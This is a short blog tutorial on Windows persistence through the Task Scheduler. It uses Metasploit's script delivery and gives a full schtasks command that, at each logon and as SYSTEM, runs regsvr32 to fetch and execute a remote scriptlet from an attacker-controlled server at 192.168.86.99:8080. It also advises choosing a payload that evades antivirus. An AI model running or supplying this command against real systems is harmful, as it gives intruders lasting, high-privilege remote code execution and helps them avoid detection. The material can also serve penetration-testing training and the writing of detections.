Schtasks Persistance

    I'll warn you up front, this may or may not work with certain a/v products.  You also don't need to use Metasploit and in fact, you're probably better off if you don't.  The concept is the same though, we're going to schedule a task to run in Windows on login.  What we choose to execute can be anything really and it's probably better if it's something that can avoid detection from a/v. 

    Using the Metasploit method, we setup script delivery:



    There are quite a few targets but I'm using Regsvr32.  When we run, it's a job and therefore will run in the background:


    We take the URL and we add that to our command:

    schtasks /create /tn Persist /TR "regsvr32 /s /n /u /i:http://192.168.86.99:8080/hPmI8lv.sct scrobj.dll" /SC onlogon /RU System


    When we look in Task Scheduler, we see our newly created task:


    When we logout and back in, we catch our session:


    Pretty simple, and again, we just need to schedule something in order to achieve that persistence on logon.


    © 2020 sevenlayers.com